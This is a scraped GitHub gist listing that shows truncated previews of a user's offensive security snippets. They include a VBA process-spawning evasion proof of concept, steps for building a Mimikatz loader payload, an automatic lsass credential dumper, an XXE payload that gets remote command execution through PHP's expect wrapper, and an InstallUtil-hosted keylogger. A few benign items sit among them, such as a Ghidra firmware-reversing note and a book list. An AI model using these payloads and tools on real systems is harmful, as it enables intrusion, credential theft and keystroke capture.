Skip to content

Instantly share code, notes, and snippets.

mosesrenegade mosesrenegade

Block or report user

Report or block mosesrenegade

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@mosesrenegade
mosesrenegade / PCMPBNMBAO_x86_poc.vba
Created Nov 4, 2019 — forked from xpn/PCMPBNMBAO_x86_poc.vba
PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON POC via VBA
View PCMPBNMBAO_x86_poc.vba
' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled
' by @_xpn_
'
' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro
Const EXTENDED_STARTUPINFO_PRESENT = &H80000
Const HEAP_ZERO_MEMORY = &H8&
Const SW_HIDE = &H0&
Const MAX_PATH = 260
Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007
View Steps.txt
1. Download the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases
2. Get Mimikatz PE Loader from https://gist.github.com/pljoel/42dae5e56a86a43612bea6961cb59d1a
3. use @pljoel katz.cs cs file and uncomment the building lines available on Delivery.Program.Main() & comment Exec() line of code.
4. Build it to generate file.b64, copy its content and replace Package.file string available on payload.txt file.
6. Make sure payloadPath var is properly set on "TestAssemblyLoader.cs"
View reversing-cisco-ios-raw-binary-firmware-images-with-ghidra.md

I was recently interested in reversing some older Cisco IOS images. Those images come in the form of a single binary blob, without any sort of ELF, Mach-o, or PE header to describe the binary.

While I am using Cisco IOS Images in this example, the same process should apply to other Raw Binary Firmware Images.

That makes importing this type of firmware file difficult, as Ghidra doesn't have any idea what type of ISA it needs to disassemble and decompile for.

The following are a few things I learned while trying to get the Cisco IOS image in a reversible state within Ghidra.

First I had to extract the image. The first 112 bytes of the firmware I received from the vendor are some sort of Cisco proprietary header that is not useful for our purpose. We need to extract the bzip2 archive that we are interested in. The easist way to do that is binwalk:

@mosesrenegade
mosesrenegade / autoProc.py
Created Aug 24, 2019 — forked from knavesec/autoProc.py
Automatic lsass dumper
View autoProc.py
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages
View XXE RCE Expect PHP
What follows below is how to trigger an RCE with PHP using the Expect Wrapper. The problem is that spaces are not interpreted correctly. Here is a great tip: Use the $IFS (Internal Field Seperator in Bash). Another pro tip: Don't allow for XXE.
https://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7
```
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://ls$IFS-lahrt">]>
<entry>
@mosesrenegade
mosesrenegade / booklist.txt
Created Sep 7, 2018
Reading List - Export list of some of the books on my kindle
View booklist.txt
.NET and COM: The Complete Interoperability Guide
@War: The Rise of the Military-Internet Complex
21st Century C: C Tips from the New School
3D Math Primer for Graphics and Game Development (Wordware Game Math Library)
A Guide to Claims-Based Identity and Access Control (Microsoft patterns & practices)
A Guide to Kernel Exploitation: Attacking the Core
A More Beautiful Question: The Power of Inquiry to Spark Breakthrough Ideas
A Primer of Analytic Number Theory: From Pythagoras to Riemann
Absolute FreeBSD, 2nd Edition: The Complete Guide to FreeBSD
Advanced C and C++ Compiling
@mosesrenegade
mosesrenegade / AtomicTestsCommandLines.txt
Created Sep 7, 2018
Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
View AtomicTestsCommandLines.txt
_ _____ ___ __ __ ___ ____ ____ _____ ____ _____ _____ _ __ __
/ \|_ _/ _ \| \/ |_ _/ ___| | _ \| ____| _ \ |_ _| ____| / \ | \/ |
/ _ \ | || | | | |\/| || | | | |_) | _| | | | | | | | _| / _ \ | |\/| |
/ ___ \| || |_| | | | || | |___ | _ <| |___| |_| | | | | |___ / ___ \| | | |
/_/ \_\_| \___/|_| |_|___\____| |_| \_\_____|____/ |_| |_____/_/ \_\_| |_|
[********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s)
View RC4-no-swap.py
#!/usr/bin/env python
debug = 0
def KSA(key):
keylength = len(key)
if debug == 1:
print("Current Keylength is " + str(keylength))
@mosesrenegade
mosesrenegade / main.cpp
Created Mar 14, 2018 — forked from hasherezade/main.cpp
A tiny PE-sieve based process scanner
View main.cpp
#include <stdio.h>
#include <windows.h>
#include <psapi.h>
#include <iostream>
#include <string>
#include <vector>
#include "pe_sieve_api.h"
#pragma comment(lib, "pe-sieve.lib")
@mosesrenegade
mosesrenegade / InstallUtilMouseKeyLogger.cs
Created Feb 26, 2018
Input Capture - InstallUtil Hosted MouseClick / KeyLogger -
View InstallUtilMouseKeyLogger.cs
using System;
using System.IO;
using System.Diagnostics;
using System.Windows.Forms;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//KeyStroke Mouse Clicks Code
/*
* https://code.google.com/p/klog-sharp/
*/
You can’t perform that action at this time.